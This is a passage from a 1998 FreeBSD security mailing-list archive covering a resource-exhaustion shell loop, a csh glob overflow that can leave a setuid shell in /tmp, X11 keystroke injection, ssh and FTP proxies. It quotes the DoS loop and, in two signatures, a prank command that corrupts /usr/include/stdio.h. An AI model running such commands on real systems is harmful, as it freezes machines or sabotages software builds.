PAA00879; Tue, 15 Sep 1998 15:41:58 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id PAA00996; Tue, 15 Sep 1998 15:41:57 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 15:41:57 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: "Jason J. Horton" cc: security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD In-Reply-To: <35FE7C66.5E73C4B6@intercom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > Problem | > ------- | > Executing the following shell script effectively freezes a | > BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above | > process, cpu and memory restrictions within 15-30 seconds: | > | > #!/bin/bash | > while() do | > grep ohdear /dev/zero & | > done | > | > Any ideas on how to fix this or secure against it? | Don't allow users on your system. I don't, it's just something I noticed while I was trying to break my system :) Hehe.. The resource limits are fine for protecting against things like fork() rabbits etc. but for some reason the above overrides them. Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:44:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20775 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:44:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from axl.training.iafrica.com (axl.training.iafrica.com [196.31.1.175]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20628 for ; Tue, 15 Sep 1998 07:43:41 -0700 (PDT) (envelope-from sheldonh@axl.training.iafrica.com) Received: from sheldonh (helo=axl.training.iafrica.com) by axl.training.iafrica.com with local-esmtp (Exim 1.92 #1) id 0zIwIi-0000FJ-00; Tue, 15 Sep 1998 16:41:52 +0200 From: Sheldon Hearn To: Zahemszky Gabor cc: freebsd-security@FreeBSD.ORG Subject: Re: csh/bash/tcsh/others? buffer overflow In-reply-to: Your message of "Tue, 15 Sep 1998 13:04:43 +0200." <199809151104.NAA01220@CoDe.hu> Date: Tue, 15 Sep 1998 16:41:51 +0200 Message-ID: <948.905870511@axl.training.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 15 Sep 1998 13:04:43 +0200, Zahemszky Gabor wrote: > Then as root do: > [...] > The bash dies... Check if there is suid shell in tmp dir: > [debian]:~$ ls -l /tmp/sh > -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh >From your post, it looks as though this "root exploit" requires root priveledges to action. Have I misread this? If not, I don't think that root having permission to create backdoors is a security concern. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 09:58:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA15080 for freebsd-security-outgoing; Tue, 15 Sep 1998 09:58:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.numachi.com (numachi.numachi.com [198.175.254.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA15059 for ; Tue, 15 Sep 1998 09:58:37 -0700 (PDT) (envelope-from reichert@numachi.com) Received: (qmail 341 invoked by uid 1001); 15 Sep 1998 16:58:13 -0000 Message-ID: <19980915125813.A16613@numachi.com> Date: Tue, 15 Sep 1998 12:58:13 -0400 From: Brian Reichert To: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: <35FD82A8.84601D49@dal.net> <3.0.3.32.19980915012359.006dae0c@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i In-Reply-To: <3.0.3.32.19980915012359.006dae0c@207.227.119.2>; from Jeffrey J. Mountin on Tue, Sep 15, 1998 at 01:23:59AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Sep 15, 1998 at 01:23:59AM -0500, Jeffrey J. Mountin wrote: > One problem is if you want to run tcp wrappers, then some services should be inetd. And need we get into certain daemons that we shouldn't run directly. I'd say use inetd for certain daemons and use wrappers. FWIW, I'm a fan of djb's ucspi TCP client software. http://pobox.com/~djb/ucspi-tcp.html It does not play well with tcp wrappers, but does utilize it's own allow/deny mechanism. -- Brian 'you Bastard' Reichert reichert@numachi.com 37 Crystal Ave. #303 Current daytime number: (617)-873-4337 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 12:37:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA14708 for freebsd-security-outgoing; Tue, 15 Sep 1998 12:37:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA14658 for ; Tue, 15 Sep 1998 12:36:54 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id PAA25410; Tue, 15 Sep 1998 15:36:28 -0400 (EDT) Date: Tue, 15 Sep 1998 15:36:27 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Jay Tribick cc: "Jason J. Horton" , security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 15 Sep 1998, Jay Tribick wrote: > The resource limits are fine for protecting against things > like fork() rabbits etc. but for some reason the above > overrides them. I just get "grep: memory exhausted" and my system is fine. This is with 3.0-current as of a few days ago. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 14:05:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02624 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:05:47 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02565 for ; Tue, 15 Sep 1998 14:05:28 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id XAA28474 for freebsd-security@FreeBSD.ORG; Tue, 15 Sep 1998 23:05:04 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (VMailer, from userid 101) id 310E31511; Tue, 15 Sep 1998 22:41:30 +0200 (CEST) Date: Tue, 15 Sep 1998 22:41:30 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: sshd1 safety? Message-ID: <19980915224130.A9252@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.94.4i In-Reply-To: ; from Jesse on Mon, Sep 14, 1998 at 11:09:49PM -0700 X-Operating-System: FreeBSD 3.0-CURRENT/ELF ctm#4637 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Jesse: > I've recently been hearing about issues with the latest (and final) > version of ssh1 that theorectically might allow remote root (or lesser) > exploits. Is anyone aware of such issues? I did searches on various sites > such as rootshell, but didn't find any major exploits. To the best of my knowledge, 1.2.26 is immune to recent bugs. 1.2.24 and below were not. I've seen nothing on Bugtraq and other places... -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #64: Fri Sep 11 23:22:44 CEST 1998 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 14:33:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10437 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:33:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-067.dublin.indigo.ie [194.125.134.197]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10360 for ; Tue, 15 Sep 1998 14:33:11 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01218; Tue, 15 Sep 1998 22:25:04 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809152125.WAA01218@indigo.ie> Date: Tue, 15 Sep 1998 22:25:03 +0000 In-Reply-To: <199809131615.JAA03746@cwsys.cwsent.com>; Cy Schubert - ITSD Open Systems Group Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Cy Schubert - ITSD Open Systems Group , Karl Denninger Subject: Re: X Security (was: Re: Err.. cat exploit.. (!)) Cc: Garrett Wollman , Josef Karthauser , Jay Tribick , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Indiscriminately displaying files without terminal control enforced (ie: by > > a pager) is EXTREMELY dangerous, especially if you're running with > > privileges (ie: as root). > > That is why doing an xhost + or even and xhost hostname even to hosts > that you think you trust is so dangerous. It is easy for someone to > inject some "keystrokes" into an Xterm to get a root shell on a host > that one is logged into. Actually, xterm will not accept synthetically generated keystrokes from XSendEvent by default, but there is nothing stopping someone from capturing keystrokes and other events. This is a pretty pedantic point, anyone using xhost to manage X security deserves to get stung. Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 14:34:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10774 for freebsd-security-outgoing; Tue, 15 Sep 1998 14:34:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-067.dublin.indigo.ie [194.125.134.197]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10678 for ; Tue, 15 Sep 1998 14:34:11 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01237; Tue, 15 Sep 1998 22:27:13 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809152127.WAA01237@indigo.ie> Date: Tue, 15 Sep 1998 22:27:12 +0000 In-Reply-To: <98Sep14.144916est.40329@border.alcanet.com.au>; Peter Jeremy Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Peter Jeremy , freebsd-security@FreeBSD.ORG Subject: Re: X-security Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 14, 2:49pm, Peter Jeremy wrote: } Subject: Re: X-security > Wes Peters wrote: > > By default, XFree86 uses "MIT MAGIC COOKIE" authen- > >tication; when the server starts it creates a .Xauthority file in > >your home directory. Anyone who can read this file will still be > >able to connect to your X server > > Note that the authentication tokens are not encrypted on the network. > Anyone who can sniff the network will also be able to connect to your > X-server. > > If you're worried about someone stealing your authentication token, > you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**) > or ssh. After you've authenticated you're still vulnerable to snooping or active attacks though, someone could still steal your authentication data by desynchronising your TCP stream and injecting the right commands. Better to use port forwarding with ssh if possible. -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 23:05:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA07698 for freebsd-security-outgoing; Tue, 15 Sep 1998 23:05:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA07687 for ; Tue, 15 Sep 1998 23:05:04 -0700 (PDT) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zJAhi-0002bU-00; Wed, 16 Sep 1998 00:04:38 -0600 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id AAA04664; Wed, 16 Sep 1998 00:05:34 -0600 (MDT) Message-Id: <199809160605.AAA04664@harmony.village.org> To: rotel@indigo.ie Subject: Re: X Security (was: Re: Err.. cat exploit.. (!)) Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 15 Sep 1998 22:25:03 -0000." <199809152125.WAA01218@indigo.ie> References: <199809152125.WAA01218@indigo.ie> Date: Wed, 16 Sep 1998 00:05:34 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199809152125.WAA01218@indigo.ie> Niall Smart writes: : Actually, xterm will not accept synthetically generated keystrokes : from XSendEvent by default, but there is nothing stopping someone : from capturing keystrokes and other events. This is a pretty : pedantic point, anyone using xhost to manage X security deserves : to get stung. But it will accept keystrokes generated from XTEST by default. I have a newton keyboard I use with my libretto which uses this feature. It would appear that the keystroke program even works with a remote display I can connect to, which is both way cool, and a possible nightmare from a security point of view. XTEST even supports mouse movements and clicking, which I plan to add to the newton keyboard just as soon as I find a way of faking mice that I like. There are serveral X extensions that can be used here that are compiled into XFree86 by default. I think they are XInputExtension, XKEYBOARD and XTEST, but I'm not sure about XKEYBOARD. There is even a RECORD extension listed on my xdpyinfo output that looks like it could be very interesting indeed. X security is less like swiss cheeze, and more like chicken wire if you are just using xhost for your security. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 00:09:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA17852 for freebsd-security-outgoing; Wed, 16 Sep 1998 00:09:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA17828 for ; Wed, 16 Sep 1998 00:09:19 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA05517; Wed, 16 Sep 1998 09:08:52 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00435; Wed, 16 Sep 1998 09:07:44 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199809160707.JAA00435@CoDe.hu> Subject: Re: csh/bash/tcsh/others? buffer overflow In-Reply-To: <948.905870511@axl.training.iafrica.com> from Sheldon Hearn at "Sep 15, 98 04:41:51 pm" To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Wed, 16 Sep 1998 09:07:44 +0200 (CEST) Cc: iafrica.com!axl@zg.CoDe.hu X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > On Tue, 15 Sep 1998 13:04:43 +0200, Zahemszky Gabor wrote: > > > Then as root do: > > [...] > > The bash dies... Check if there is suid shell in tmp dir: > > [debian]:~$ ls -l /tmp/sh > > -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh > > >From your post, it looks as though this "root exploit" requires root > priveledges to action. Have I misread this? If not, I don't think that > root having permission to create backdoors is a security concern. OK. The short history: a local user can write the tmp-like directories on a FreeBSD (and other Unices) machine. He can make files, subdirectories. If as a local user, I make a tricky named directory-structure, it's not a problem. But. If you are my sysadmin, maybe you are the person, who make ``garbage-collection'' in the filesystem. Maybe an automatic script, maybe by hand. The problem is that if you make only this command: # ls /tmp ... dXXXXXXXX 3 fuckinguser fuckinggroup ...... AAAA................... ... it doesn't matter. Try to do: # ls /tmp/A* no problem, but # ls A*/*/*/*/* _only for looking_ into the directory, the globbing routine in csh overflows, and want to run the program which is the name of one of the directories in that tree. So. Yes, to make the hole, we need root privileges. But it _is_ a problem, much like the well-known ``mroe'' bug, and any others. With the others, root has to make holes in his/her environment (writeable directory - eg.: . - in his path), but with this, he has to make normal things: ls or cd or any other. And maybe it's automatic with a home made csh-script. Uff. ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 01:55:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05082 for freebsd-security-outgoing; Wed, 16 Sep 1998 01:55:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05074 for ; Wed, 16 Sep 1998 01:55:55 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA26852; Wed, 16 Sep 1998 09:55:33 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id JAA04833; Wed, 16 Sep 1998 09:55:31 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Wed, 16 Sep 1998 09:55:31 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: ben@rosengart.com cc: security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > The resource limits are fine for protecting against things | > like fork() rabbits etc. but for some reason the above | > overrides them. | | I just get "grep: memory exhausted" and my system is fine. | | This is with 3.0-current as of a few days ago. Hmm.. I've tried it a few different ways with various restrictions and each time it manages to completely freeze my box. Anyone else out there tried it on a 3.0 system (i don't run 3.x on mine)? Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 06:32:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA10391 for freebsd-security-outgoing; Wed, 16 Sep 1998 06:32:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA10384 for ; Wed, 16 Sep 1998 06:32:19 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id JAA28148; Wed, 16 Sep 1998 09:31:52 -0400 (EDT) Date: Wed, 16 Sep 1998 09:31:52 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Niall Smart cc: Peter Jeremy , freebsd-security@FreeBSD.ORG Subject: Re: X-security In-Reply-To: <199809152127.WAA01237@indigo.ie> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 15 Sep 1998, Niall Smart wrote: > > Note that the authentication tokens are not encrypted on the network. > > Anyone who can sniff the network will also be able to connect to your > > X-server. > > > > If you're worried about someone stealing your authentication token, > > you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**) > > or ssh. > > After you've authenticated you're still vulnerable to snooping or > active attacks though, someone could still steal your authentication > data by desynchronising your TCP stream and injecting the right > commands. Better to use port forwarding with ssh if possible. I personally like this arrangement: Xnest :1 -auth /xauth/randomauthfile xterm -display :1 -e slogin -l username hostname This restricts X programs coming from a remote untrusted host to a particular Xnest. No doubt there are some problems with this (due to the flakiness of Xnest, etc), but this can be fairly effective against observers from untrusted hosts. With ssh going, you prevent on-the-wire and joe-user-on-the-remote-host attacks (as ssh maintains the encryption and .Xauthority key). With Xnest you limit the scope of someone who has managed to get access to your tunnel or the display key (like root on the remote system). Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 06:57:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA14550 for freebsd-security-outgoing; Wed, 16 Sep 1998 06:57:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nak.myhouse.com (nak.myhouse.com [209.70.45.162]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA14545 for ; Wed, 16 Sep 1998 06:57:17 -0700 (PDT) (envelope-from zoonie@myhouse.com) Received: from localhost (zoonie@localhost) by nak.myhouse.com (8.8.8/8.8.7) with ESMTP id JAA19306; Wed, 16 Sep 1998 09:56:01 -0400 (EDT) (envelope-from zoonie@myhouse.com) X-Authentication-Warning: nak.myhouse.com: zoonie owned process doing -bs Date: Wed, 16 Sep 1998 09:56:01 -0400 (EDT) From: zoonie To: Warner Losh cc: rotel@indigo.ie, freebsd-security@FreeBSD.ORG Subject: Re: X Security (was: Re: Err.. cat exploit.. (!)) In-Reply-To: <199809160605.AAA04664@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org warner is correct about XTEST, if you look at a2x it does this also, in fact there were 3 ways to get keystrokes and mouse movements to X. a2x can use any of them. i don't remember what they are off hand but i do remember that there were 3 different methods depending on the X server. for those of you that don't know what a2x is it's an interface for using voice recognition software to control X on your workstation. it mainly works with dragondictate but i think that you can get it to work with any voice recognition software. i fooled around with it a few months ago when i had tendinitous and was restricting the amount of typing i did..... On Wed, 16 Sep 1998, Warner Losh wrote: > In message <199809152125.WAA01218@indigo.ie> Niall Smart writes: > : Actually, xterm will not accept synthetically generated keystrokes > : from XSendEvent by default, but there is nothing stopping someone > : from capturing keystrokes and other events. This is a pretty > : pedantic point, anyone using xhost to manage X security deserves > : to get stung. > > But it will accept keystrokes generated from XTEST by default. I have > a newton keyboard I use with my libretto which uses this feature. It > would appear that the keystroke program even works with a remote > display I can connect to, which is both way cool, and a possible > nightmare from a security point of view. XTEST even supports mouse > movements and clicking, which I plan to add to the newton keyboard > just as soon as I find a way of faking mice that I like. There are > serveral X extensions that can be used here that are compiled into > XFree86 by default. I think they are XInputExtension, XKEYBOARD and > XTEST, but I'm not sure about XKEYBOARD. > > There is even a RECORD extension listed on my xdpyinfo output that > looks like it could be very interesting indeed. > > X security is less like swiss cheeze, and more like chicken wire if > you are just using xhost for your security. > > Warner > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --------------------------------------------- The devil finds work for idle circuits to do. --------------------------------------------- zoonie at myhouse dot com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 14:42:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA13213 for freebsd-security-outgoing; Wed, 16 Sep 1998 14:42:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA13116; Wed, 16 Sep 1998 14:41:16 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id RAA09975; Wed, 16 Sep 1998 17:40:40 -0400 (EDT) From: "Allen Smith" Message-Id: <9809161740.ZM9973@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 17:40:39 -0400 X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Copyleft/BSD Copyright FTP Proxy Software Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. Anybody know of any good Copyleft or BSD Copyright FTP Proxy Software? SOCKS version 4 is no longer being supported by its developers, so far as I can tell. Thanks, -Allen P.S. I'm wanting copyleft or BSD copyright because those tend to get security and other fixes a lot faster, plus I have in mind some improvements to the normal proxy server functions that I'd like to be able to distribute. -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 15:59:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA01837 for freebsd-security-outgoing; Wed, 16 Sep 1998 15:59:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA01670; Wed, 16 Sep 1998 15:58:33 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id SAA22360; Wed, 16 Sep 1998 18:57:57 -0400 (EDT) From: "Allen Smith" Message-Id: <9809161857.ZM22358@beatrice.rutgers.edu> Date: Wed, 16 Sep 1998 18:57:56 -0400 In-Reply-To: Scott Morris "Re: Copyleft/BSD Copyright FTP Proxy Software" (Sep 16, 6:48pm) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: isp@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Copyleft/BSD Copyright FTP Proxy Software Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm sorry, I didn't specify sufficiently. We're needing to support FTP PUTs, so squid won't work (even if it wasn't for browsers, not command line FTP programs). We're about to be using FreeBSD for a firewall for IRIX machines, and the Socks version 4, as well as not being supported currently (or at least not well supported), doesn't work right on IRIX. I've asked on the Socks mailing list about this problem, and the only reply I got was to go to the (restrictively copyrighted) version of Socks 5. Incidentally, if there's one out there that'll do well, I'm willing to try making the proxy server portion of it into a port. Thanks, -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 16 18:13:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02689 for freebsd-security-outgoing; Wed, 16 Sep 1998 18:13:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from duey.hs.wolves.k12.mo.us (duey.hs.wolves.k12.mo.us [207.160.214.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02558; Wed, 16 Sep 1998 18:12:43 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from duey.hs.wolves.k12.mo.us (cdillon@duey.hs.wolves.k12.mo.us [207.160.214.9]) by duey.hs.wolves.k12.mo.us (8.8.7/8.8.7) with SMTP id UAA14971; 